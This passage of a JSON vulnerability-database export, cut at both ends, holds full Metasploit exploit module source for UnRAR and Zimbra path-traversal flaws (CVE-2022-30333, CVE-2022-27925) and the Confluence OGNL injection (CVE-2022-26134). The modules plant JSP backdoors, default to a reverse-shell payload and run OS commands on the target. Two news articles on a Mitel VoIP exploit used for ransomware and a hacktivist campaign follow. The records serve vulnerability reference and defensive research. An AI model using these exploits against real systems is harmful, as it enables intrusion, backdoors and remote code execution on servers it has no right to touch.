trigger our payload (expected HTTP/404, got HTTP/#{res.code}\")\n end\n end\n\n begin\n rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)\n rescue StandardError => e\n fail_with(Failure::BadConfig, \"Failed to encode RAR file: #{e}\")\n end\n\n file_create(rar)\n\n print_good('File created! 
Email the file above to any user on the target Zimbra server')\n\n # Bail if they don't want the payload triggered\n return unless datastore['TRIGGER_PAYLOAD']\n\n register_file_for_cleanup(target_filename)\n\n interval = datastore['CheckInterval'].to_i\n print_status(\"Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...\")\n\n # This loop is mostly from `multi/handler`\n stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i\n timeout = datastore['ListenerTimeout'].to_i\n\n # We flip this once we trigger the payload\n keep_sending = true\n loop do\n break if session_created?\n break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)\n\n # Once we've triggered the payload, stop trying to\n if keep_sending\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n unless res\n fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')\n end\n\n # Break when the file successfully appears\n if res.code == 200\n print_good('Successfully triggered the payload')\n keep_sending = false\n next\n end\n end\n\n Rex::ThreadSafe.sleep(interval)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T15:23:28", "description": "This module creates a RAR file that exploits CVE-2022-30333, which is a path-traversal vulnerability in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. UnRAR fixed this vulnerability in version 6.12 (open source version 6.1.7). The core issue is that when a symbolic link is unRAR'ed, Windows symbolic links are not properly validated on Linux systems and can therefore write a symbolic link that points anywhere on the filesystem. 
If a second file in the archive has the same name, it will be written to the symbolic link path.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-19T21:05:15", "type": "metasploit", "title": "UnRAR Path Traversal (CVE-2022-30333)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-22T18:46:50", "id": "MSF:EXPLOIT-LINUX-FILEFORMAT-UNRAR_CVE_2022_30333-", "href": "https://www.rapid7.com/db/modules/exploit/linux/fileformat/unrar_cve_2022_30333/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n include Msf::Exploit::Format::RarSymlinkPathTraversal\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'UnRAR Path Traversal (CVE-2022-30333)',\n 'Description' => %q{\n This module creates a RAR file that exploits CVE-2022-30333, which is a\n path-traversal vulnerability in unRAR that can extract an 
arbitrary file\n to an arbitrary location on a Linux system. UnRAR fixed this\n vulnerability in version 6.12 (open source version 6.1.7).\n\n The core issue is that when a symbolic link is unRAR'ed, Windows\n symbolic links are not properly validated on Linux systems and can\n therefore write a symbolic link that points anywhere on the filesystem.\n If a second file in the archive has the same name, it will be written\n to the symbolic link path.\n },\n 'Author' => [\n 'Simon Scannell', # Discovery / initial disclosure (via Sonar)\n 'Ron Bowes', # Analysis, PoC, and module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-30333'],\n ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],\n ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],\n ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Generic RAR file', {} ]\n ],\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-06-28',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => []\n }\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),\n OptString.new('CUSTOM_PAYLOAD', [ false, 'A custom payload to encode' ]),\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\" - as well as a filename).']),\n OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)'])\n ]\n )\n end\n\n def exploit\n print_status(\"Target filename: #{datastore['TARGET_PATH']}\")\n\n if datastore['CUSTOM_PAYLOAD'].present?\n print_status(\"Encoding custom payload file: #{datastore['CUSTOM_PAYLOAD']}\")\n payload_data = File.binread(datastore['CUSTOM_PAYLOAD'])\n\n # 
Append a newline + NUL byte, since random data will be appended and we\n # don't want to break shellscripts\n payload_data.concat(\"\\n\\0\")\n else\n print_status('Encoding configured payload')\n payload_data = generate_payload_exe\n end\n\n begin\n rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), datastore['TARGET_PATH'], payload_data)\n rescue StandardError => e\n fail_with(Failure::BadConfig, \"Failed to encode RAR file: #{e}\")\n end\n\n file_create(rar)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T15:23:32", "description": "This module POSTs a ZIP file containing path traversal characters to the administrator interface for Zimbra Collaboration Suite. If successful, it plants a JSP-based backdoor within the web directory, then executes it. The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's ZIP implementation that can result in the extraction of an arbitrary file to an arbitrary location on the host. 
This issue is exploitable on the following versions of Zimbra: * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier) * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier) Note that the Open Source Edition is not affected.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-23T16:43:51", "type": "metasploit", "title": "Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-08-23T16:44:03", "id": "MSF:EXPLOIT-LINUX-HTTP-ZIMBRA_MBOXIMPORT_CVE_2022_27925-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/zip'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 
'Name' => 'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)',\n 'Description' => %q{\n This module POSTs a ZIP file containing path traversal characters to\n the administrator interface for Zimbra Collaboration Suite. If\n successful, it plants a JSP-based backdoor within the web directory, then\n executes it.\n\n The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's\n ZIP implementation that can result in the extraction of an arbitrary file\n to an arbitrary location on the host.\n\n This issue is exploitable on the following versions of Zimbra:\n\n * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)\n * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)\n\n Note that the Open Source Edition is not affected.\n },\n 'Author' => [\n 'Volexity Threat Research', # Initial writeup\n \"Yang_99's Nest\", # PoC\n 'Ron Bowes', # Analysis / module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-27925'],\n ['CVE', '2022-37042'],\n ['URL', 'https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/'],\n ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa22-228a'],\n ['URL', 'https://www.yang99.top/index.php/archives/82/'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbraAdmin/public/',\n 'TARGET_FILENAME' => nil,\n 'RPORT' => 7071,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-05-10',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n 
register_options(\n [\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']),\n OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),\n OptString.new('TARGET_USERNAME', [ true, 'The target user, must be valid on the Zimbra server', 'admin']),\n ]\n )\n end\n\n # Generate an on-system filename using datastore options\n def generate_target_filename\n if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')\n print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')\n end\n\n File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\")\n end\n\n # Normalize the path traversal and figure out where it is relative to the web root\n def zimbra_get_public_path(target_filename)\n # Normalize the path\n normalized_path = Pathname.new(File.join('/opt/zimbra/log', target_filename)).cleanpath\n\n # Figure out where it is, relative to the webroot\n webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/')\n relative_path = normalized_path.relative_path_from(webroot)\n\n # Hopefully, we found a path from the webroot to the payload!\n if relative_path.to_s.start_with?('../')\n return nil\n end\n\n relative_path\n end\n\n def exploit\n print_status('Encoding the payload as a .jsp file')\n payload = Msf::Util::EXE.to_jsp(generate_payload_exe)\n\n # Create a file\n target_filename = generate_target_filename\n print_status(\"Target filename: #{target_filename}\")\n\n # Create a zip file\n zip = Rex::Zip::Archive.new\n zip.add_file(target_filename, payload)\n data = zip.pack\n\n print_status('Sending POST request with ZIP file')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => 
\"/service/extension/backup/mboximport?account-name=#{datastore['TARGET_USERNAME']}&ow=1&no-switch=1&append=1\",\n 'data' => data\n )\n\n # Check the response\n if res.nil?\n fail_with(Failure::Unreachable, \"Could not connect to the target port (#{datastore['RPORT']})\")\n elsif res.code == 404\n fail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable')\n elsif res.code != 401\n print_warning(\"Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed\")\n end\n\n # Get the public path for triggering the vulnerability, terminate if we\n # can't figure it out\n public_filename = zimbra_get_public_path(target_filename)\n if public_filename.nil?\n fail_with(Failure::BadConfig, 'Could not determine the public web path, maybe you need to traverse further back?')\n end\n\n register_file_for_cleanup(target_filename)\n\n print_status(\"Trying to trigger the backdoor @ #{public_filename}\")\n\n # Trigger the backdoor\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n if res.nil?\n fail_with(Failure::Unreachable, 'Could not connect to trigger the payload')\n elsif res.code == 200\n print_good('Successfully triggered the payload')\n elsif res.code == 404\n fail_with(Failure::Unknown, \"Payload was not uploaded, the server probably isn't vulnerable\")\n else\n fail_with(Failure::Unknown, \"Could not connect to the server to trigger the payload: HTTP/#{res.code}\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T08:41:50", "description": "This module exploits an OGNL injection in Atlassian Confluence servers. 
A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.\n", "cvss3": {}, "published": "2022-06-03T19:27:13", "type": "metasploit", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T21:11:56", "id": "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_NAMESPACE_OGNL_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Namespace OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence servers. 
A specially crafted URI can be used to\n evaluate an OGNL expression resulting in OS command execution.\n },\n 'Author' => [\n 'Unknown', # exploited in the wild\n 'bturner-r7',\n 'jbaines-r7',\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2022-26134'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],\n ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],\n ['URL', 'https://github.com/jbaines-r7/through_the_wire'],\n ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']\n ],\n 'DisclosureDate' => '2022-06-02',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n confluence_version = get_confluence_version\n return CheckCode::Unknown unless confluence_version\n\n vprint_status(\"Detected Confluence version: #{confluence_version}\")\n\n confluence_platform = get_confluence_platform\n unless confluence_platform\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n vprint_status(\"Detected target platform: #{confluence_platform}\")\n 
CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def get_confluence_platform\n # this method gets the platform by exploiting CVE-2022-26134\n return @confluence_platform if @confluence_platform\n\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n ognl = <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\n \"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.System.getProperty('os.name')\")\n )\n }\n OGNL\n res = inject_ognl(ognl)\n return nil unless res\n\n res.headers[header]\n end\n\n def get_confluence_version\n return @confluence_version if @confluence_version\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login.action')\n )\n return nil unless res&.code == 200\n\n poweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text\n return nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/\n\n @confluence_version = Rex::Version.new(Regexp.last_match(1))\n @confluence_version\n end\n\n def exploit\n confluence_platform = get_confluence_platform\n unless confluence_platform\n fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')\n end\n\n unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')\n fail_with(Failure::NoTarget, \"The target platform '#{confluence_platform}' is incompatible with '#{target.name}'\")\n end\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n ognl = <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n 
Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.Runtime.getRuntime().exec([\n #{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"},\n com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')\n ]); '#{Faker::Internet.uuid}'\")\n )\n }\n OGNL\n res = inject_ognl(ognl, 'headers' => { header => cmd })\n\n unless res && res.headers.include?(header)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n res.headers[header]\n end\n\n def inject_ognl(ognl, opts = {})\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl), 'dashboard.action')\n }.merge(opts))\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2022-06-28T12:49:55", "description": "Ransomware groups are abusing unpatched versions of a Linux-based Mitel VoIP (Voice over Internet Protocol) application and using it as a springboard to plant malware on targeted systems. The critical remote code execution (RCE) flaw, tracked as [CVE-2022-29499](<https://nvd.nist.gov/vuln/detail/CVE-2022-29499>), was first [reported by Crowdstrike](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>) in April as a zero-day vulnerability and is now patched.\n\nMitel is best known for providing business phone systems and unified communications as a service (UCaaS) to organizations of all kinds. Mitel focuses on VoIP technology, which lets users make phone calls over an internet connection instead of regular telephone lines.\n\nAccording to Crowdstrike, the vulnerability affects the Mitel MiVoice appliances SA 100, SA 400 and Virtual SA. MiVoice provides a simple interface to bring all communications and tools together.\n\n## **Bug Exploited to Plant Ransomware **\n\nResearchers at Crowdstrike recently investigated a suspected ransomware attack. The team contained the intrusion quickly, but believes the vulnerability (CVE-2022-29499) was used in the ransomware strike.\n\nCrowdstrike traced the origin of the malicious activity to an IP address associated with a Linux-based Mitel VoIP appliance. Further analysis led to the discovery of a novel remote code execution exploit.\n\n\u201cThe device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment,\u201d Patrick Bennett [wrote in a blog post](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>).\n\nThe exploit involves two GET requests. The first targets a \u201cget_url\u201d parameter of a PHP file; the second originates from the device itself.\n\n\u201cThis first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses,\u201d the researcher explained.\n\nThe second request, issued by the device itself, performs an HTTP GET against attacker-controlled infrastructure and executes the command stored on the attacker\u2019s server, completing the command injection.\n\nAccording to the researchers, the adversary used the flaw to create an SSL-enabled reverse shell via the \u201cmkfifo\u201d command and \u201copenssl_client\u201d to send outbound requests from the compromised network. The \u201cmkfifo\u201d command creates a named pipe, a special file that multiple processes can open for reading or writing.\n\nOnce the reverse shell was established, the attacker created a web shell named \u201cpdf_import.php\u201d. The original content of the web shell was not recovered, but the researchers identified a log file that includes a POST request to the same IP address the exploit originated from. The adversary also downloaded a tunneling tool called \u201cChisel\u201d onto the VoIP appliance to pivot further into the network without being detected.\n\nCrowdstrike also identified anti-forensic techniques the threat actors used to conceal the activity.\n\n\u201cAlthough the threat actor deleted all files from the VoIP device\u2019s filesystem, CrowdStrike was able to recover forensic data from the device. This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor,\u201d said Bennett.\n\nMitel released a [security advisory](<https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0002>) on April 19, 2022, for MiVoice Connect versions 19.2 SP3 and earlier, though no official patch had been released at the time of writing.\n\n## **Vulnerable Mitel Devices on Shodan**\n\nThe security researcher Kevin Beaumont shared a string, \u201chttp.html_hash:-1971546278\u201d, to search for vulnerable Mitel devices on the Shodan search engine in a [Twitter thread](<https://twitter.com/GossiTheDog/status/1540354721931841537>).\n\nAccording to Beaumont, there are approximately 21,000 publicly accessible Mitel appliances worldwide, the majority of which are located in the United States, followed by the United Kingdom.\n\n## **Mitel Mitigation Recommendations **\n\nCrowdstrike recommends that organizations tighten their defenses by performing threat modeling and hunting for malicious activity. The researchers also advised segregating critical assets from perimeter devices to restrict access in case perimeter devices are compromised.\n\n\u201cTimely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant,\u201d Bennett explained.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-28T12:42:34", "type": "threatpost", "title": "Mitel VoIP Bug Exploited in Ransomware Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-06-28T12:42:34", "id": "THREATPOST:7F03D6D7702417D24F26A06CBC31EE83", "href": "https://threatpost.com/mitel-voip-bug-exploited/180079/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T15:52:57", "description": "According to a new [advisory](<https://www.radware.com/getattachment/bde65cb6-ace4-4dea-bce3-5f3b6cc1c951/Advisory-DragonForce-OpsPatuk-OpsIndia-final.pdf.aspx>) from Radware, a hacktivist group called DragonForce Malaysia, \u201cwith the assistance of several other threat groups, has begun indiscriminately scanning, defacing and launching denial-of-service attacks against numerous websites in India.\u201d In addition to DDoS, their targeted campaign \u2013 dubbed \u201cOpsPatuk\u201d \u2013 involves advanced threat actors \u201cleveraging current exploits, breaching networks and leaking data.\u201d\n\nDragonForce Malaysia \u2013 best known for their hacktivism in support of the Palestinian cause \u2013 have turned their attention to India this time, in response to a controversial comment made by a Hindu political spokesperson about the Prophet Mohammed.\n\nAccording to the advisory, OpsPatuk remains ongoing today.\n\n## The Casus Belli\n\nIn a televised debate last month, Nupur Sharma \u2013 a spokesperson for the Hindu nationalist Bharatiya Janata Party (BJP) \u2013 made controversial remarks regarding the age of the Prophet Mohammed\u2019s third wife, Aisha. Widespread outrage followed, involving statements from leaders in the Muslim world, large protests, and the ousting of Sharma herself from the BJP.\n\nThen, beginning on June 10, DragonForce Malaysia entered the fray. 
Their new offensive against the government of India was first enshrined in a [tweet](<https://twitter.com/DragonForceIO/status/1535273727755096064?ref_src=twsrc%5Etfw>):\n\n_Greetings The Government of India. __We Are DragonForce Malaysia. __This is a special operation on the insult of our Prophet Muhammad S.A.W. __India Government website hacked by DragonForce Malaysia. We will never remain silent. __Come Join This Operation ! __#OpsPatuk Engaged_\n\n\n\n(image from @DragonForceIO on Twitter)\n\nThe new advisory confirms that the group has used DDoS to perform \u201cnumerous defacements across India,\u201d pasting their logo and messaging to targeted websites.\n\nThe group also \u201cclaimed to have breached and leaked data from various government agencies, financial institutions, universities, service providers, and several other Indian databases.\u201d\n\nThe researchers also observed other hacktivists \u2013 \u2018Localhost\u2019, \u2018M4NGTX\u2019, \u20181887\u2019, and \u2018RzkyO\u2019 \u2013 joining the party, \u201cdefacing multiple websites across India in the name of their religion.\u201d\n\n## Who are DragonForce Malaysia?\n\nDragonForce Malaysia is a hacktivist group in the vein of Anonymous. They\u2019re connected by political goals, with a penchant for sensationalism. Their social media channels and website forums \u2013 used for everything \u201cranging from running an eSports team to launching cyberattacks\u201d \u2013 are visited by tens of thousands of users.\n\nIn the past, DragonForce have launched attacks against organizations and government entities across the Middle East and Asia. Their favorite target has been Israel, having launched multiple operations \u2013 #OpsBedil, #OpsBedilReloaded and #OpsRWM \u2013 against the nation and its citizens.\n\nAccording to the authors of the advisory, DragonForce are \u201cnot considered an advanced or a persistent threat group, nor are they currently considered to be sophisticated. 
But where they lack sophistication, they make up for it with their organizational skills and ability to quickly disseminate information to other members.\u201d Like Anonymous with the Low Orbit Ion Cannon, DragonForce weaponizes its own open source DoS tools \u2013 Slowloris, DDoSTool, DDoS-Ripper, Hammer, and more \u2013 in choreographed, flashy website defacements.\n\nSome members, \u201cover the last year, have demonstrated the ability and desire to evolve into a highly sophisticated threat group.\u201d Among other things, that\u2019s included leveraging publicly disclosed vulnerabilities. In OpsPatuk, for example, they\u2019ve been working with the recently discovered [CVE-2022-26134](<https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/>).\n\n\u201cDragonForce Malaysia and its associates have proven their ability to adapt and evolve with the threat landscape in the last year,\u201d concluded the authors. With no signs of slowing down, \u201cRadware expects DragonForce Malaysia to continue launching new reactionary campaigns based on their social, political, and religious affiliations in the foreseeable future.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T13:59:37", "type": "threatpost", "title": "DragonForce 